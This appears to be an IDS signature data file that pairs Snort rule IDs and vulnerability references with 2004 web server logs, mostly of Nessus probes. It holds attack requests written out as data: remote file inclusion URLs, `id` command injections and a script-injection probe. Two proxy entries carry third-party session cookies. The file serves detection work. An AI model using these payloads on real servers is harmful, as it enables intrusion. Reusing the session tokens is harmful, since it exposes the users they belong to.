2155	BID7542 BID7543 Nessus 11615	web-application-attack	WEB-PHP ttforum remote command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:40:03 2004] "GET /modules/forum/index.php?board=10;action=news;ext=help;template=http://xxxxxxxxxxxx HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/modules/forum/index.php] for 50000 ms ---------------------------------------- GET /modules/forum/index.php?board=10;action=news;ext=help;template=http://xxxxxxxxxxxx HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "template=http" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2156	Nessus 11685	web-application-activity	WEB-MISC mod_gzip_status access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:45 2004] "GET /mod_gzip_status HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "/mod_gzip_status" at THE_REQUEST. ---------------------------------------- GET /mod_gzip_status HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/mod_gzip_status" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2194	Nessus 11748 CAN-2002-0749	web-application-activity	WEB-CGI CSMailto.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:30 2004] "GET /cgi-bin/CSMailto.cgi HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/CSMailto.cgi ---------------------------------------- GET /cgi-bin/CSMailto.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2195	Nessus 11748 CAN-2002-0346	web-application-activity	WEB-CGI alert.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:06 2004] "GET /cgi-bin/alert.cgi HTTP/1.1" 404 297 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/alert.cgi ---------------------------------------- GET /cgi-bin/alert.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2198	Nessus 11748 CAN-2003-0153	web-application-activity	WEB-CGI cvslog.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:17 2004] "GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cvslog.cgi ---------------------------------------- GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2199	Nessus 11748 CAN-2003-0153	web-application-activity	WEB-CGI multidiff.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/multidiff.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/multidiff.cgi ---------------------------------------- GET /cgi-bin/multidiff.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2200	Nessus 11748 CAN-2000-0423	web-application-activity	WEB-CGI dnewsweb.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/dnewsweb.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/dnewsweb.cgi ---------------------------------------- GET /cgi-bin/dnewsweb.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=85 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2201	Nessus 11748 CAN-1999-1377	web-application-activity	WEB-CGI download.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/download.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/download.cgi ---------------------------------------- GET /cgi-bin/download.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=83 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2202	Nessus 11748 CAN-2001-1196	web-application-activity	WEB-CGI edit_action.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:35 2004] "GET /cgi-bin/edit_action.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/edit_action.cgi ---------------------------------------- GET /cgi-bin/edit_action.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=81 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2203	Nessus 11748 CAN-2001-0023	web-application-activity	WEB-CGI everythingform.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/everythingform.cgi HTTP/1.1" 403 310 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/everythingform.cgi ---------------------------------------- GET /cgi-bin/everythingform.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=77 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2204	Nessus 11748 CAN-2002-0263	web-application-activity	WEB-CGI ezadmin.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/ezadmin.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezadmin.cgi ---------------------------------------- GET /cgi-bin/ezadmin.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=75 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2205	Nessus 11748 CAN-2002-0263	web-application-activity	WEB-CGI ezboard.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:36 2004] "GET /cgi-bin/ezboard.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezboard.cgi ---------------------------------------- GET /cgi-bin/ezboard.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2206	Nessus 11748 CAN-2002-0263	web-application-activity	WEB-CGI ezman.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/ezman.cgi HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ezman.cgi ---------------------------------------- GET /cgi-bin/ezman.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=71 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2207	Nessus 11748 CAN-2002-0611	web-application-activity	WEB-CGI fileseek.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/FileSeek.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/FileSeek.cgi ---------------------------------------- GET /cgi-bin/FileSeek.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=67 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2208	Nessus 11748 CAN-2002-0230	web-application-activity	WEB-CGI fom.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:37 2004] "GET /cgi-bin/fom.cgi HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/fom.cgi ---------------------------------------- GET /cgi-bin/fom.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=65 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2209	Nessus 11748 CAN-2000-0288	web-application-activity	WEB-CGI getdoc.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/getdoc.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/getdoc.cgi ---------------------------------------- GET /cgi-bin/getdoc.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=61 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2210	Nessus 11748 CVE-2000-0952	web-application-activity	WEB-CGI global.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/global.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/global.cgi ---------------------------------------- GET /cgi-bin/global.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=59 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2211	Nessus 11748 CAN-2001-0180	web-application-activity	WEB-CGI guestserver.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET /cgi-bin/guestserver.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/guestserver.cgi ---------------------------------------- GET /cgi-bin/guestserver.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=57 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2212	Nessus 11748 CAN-2002-1334	web-application-activity	WEB-CGI imageFolio.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/imageFolio.cgi HTTP/1.1" 403 306 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/imageFolio.cgi ---------------------------------------- GET /cgi-bin/imageFolio.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=55 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2213	Nessus 11748 CVE-2000-0977	web-application-activity	WEB-CGI mailfile.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/mailfile.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailfile.cgi ---------------------------------------- GET /cgi-bin/mailfile.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=51 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2214	Nessus 11748 CAN-2000-0526	web-application-activity	WEB-CGI mailview.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/mailview.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailview.cgi ---------------------------------------- GET /cgi-bin/mailview.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=49 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2215	Nessus 11748 CAN-2000-1023	web-application-activity	WEB-CGI nsManager.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/nsManager.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/nsManager.cgi ---------------------------------------- GET /cgi-bin/nsManager.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=45 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2216	Nessus 11748 CAN-2001-1283	web-application-activity	WEB-CGI readmail.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/readmail.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/readmail.cgi ---------------------------------------- GET /cgi-bin/readmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=41 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2217	Nessus 11748 CAN-2001-1283	web-application-activity	WEB-CGI printmail.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:41 2004] "GET /cgi-bin/printmail.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/printmail.cgi ---------------------------------------- GET /cgi-bin/printmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=39 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2218	Nessus 11748 CAN-2002-0346	web-application-activity	WEB-CGI service.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/service.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/service.cgi ---------------------------------------- GET /cgi-bin/service.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=31 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2219	Nessus 11748 CAN-2001-0133	web-application-activity	WEB-CGI setpasswd.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/setpasswd.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/setpasswd.cgi ---------------------------------------- GET /cgi-bin/setpasswd.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=29 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2220	Nessus 11748 CAN-2001-0022	web-application-activity	WEB-CGI simplestmail.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:42 2004] "GET /cgi-bin/simplestmail.cgi HTTP/1.1" 403 308 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/simplestmail.cgi ---------------------------------------- GET /cgi-bin/simplestmail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=27 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2221	Nessus 11748 CAN-2001-1343	web-application-activity	WEB-CGI ws_mail.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:45:43 2004] "GET /cgi-bin/ws_mail.cgi HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ws_mail.cgi ---------------------------------------- GET /cgi-bin/ws_mail.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2222	Nessus 11740 BID7912 BID7911 BID7910	web-application-activity	WEB-CGI nph-exploitscanget.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:44:06 2004] "GET /cgi-bin/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1" 404 310 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/nph-exploitscanget.cgi ---------------------------------------- GET /cgi-bin/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2223	CVE-2002-0923 BID4994	web-application-activity	WEB-CGI csNews.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:53 2004] "GET /cgi-bin/csNews.cgi HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csNews.cgi ---------------------------------------- GET /cgi-bin/csNews.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2224	Nessus 11750 BID6607	web-application-activity	WEB-CGI psunami.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:31 2004] "GET /shop/psunami.cgi?file=\|id\| HTTP/1.1" 404 296 Handler: (null) Error: File does not exist: /usr/local/apache/htdocs/shop/psunami.cgi ---------------------------------------- GET /shop/psunami.cgi?file=\|id\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2226	BID7919 Nessus 11739	web-application-attack	WEB-PHP pmachine remote command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:44:37 2004] "GET /cgi-bin/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1" 404 299 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/lib.inc.php ---------------------------------------- GET /cgi-bin/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2229	BID7979 Nessus 11767	web-application-attack	WEB-PHP viewtopic.php access	Request: 210.49.12.237 - - [Thu Mar 11 03:53:30 2004] "GET http://www.exovian.com/forum/viewtopic.php?t=18 HTTP/1.0" 200 25000 Handler: proxy-server ---------------------------------------- GET http://www.exovian.com/forum/viewtopic.php?t=18 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-gsarcade-launch, / Accept-Language: en-au Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2278b27329af91250c430f1f2892f0e3cc%22%3Bs%3A6%3A%22userid%22%3Bi%3A16%3B%7D; bbmode=normal; phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=470bafeaffd67803a8218bce2208cffa Host: www.exovian.com Proxy-Connection: Keep-Alive Referer: http://www.exovian.com/forum/viewforum.php?f=10&sid=470bafeaffd67803a8218bce2208cffa User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) HTTP/1.0 200 OK X-Powered-By: PHP/4.3.3 Cache-Control: private, pre-check=0, post-check=0, max-age=0 Expires: 0 Pragma: no-cache Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
2231	Nessus 11747 CAN-2001-0958	web-application-activity	WEB-MISC register.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:46:03 2004] "GET /cgi-bin/register.dll HTTP/1.1" 404 300 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/register.dll ---------------------------------------- GET /cgi-bin/register.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2246	Nessus 11771	web-application-activity	WEB-MISC webadmin.dll access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:05 2004] "GET /cgi-bin/webadmin.dll HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webadmin.dll ---------------------------------------- GET /cgi-bin/webadmin.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
2303	BID8890	web-application-activity	WEB-PHP Advanced Poll popup.php access	Request: 203.77.209.35 - - [Thu Mar 11 04:38:19 2004] "GET http://www.ligabankmandiri.com/popup.php HTTP/1.0" 200 359 Handler: proxy-server ---------------------------------------- GET http://www.ligabankmandiri.com/popup.php HTTP/1.0 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-us Cookie: PHPSESSID=eaa093b3cfa1d89ccc6a52beb24c0f82 Host: www.ligabankmandiri.com Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP/1.0 200 OK X-Powered-By: PHP/4.1.2 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close
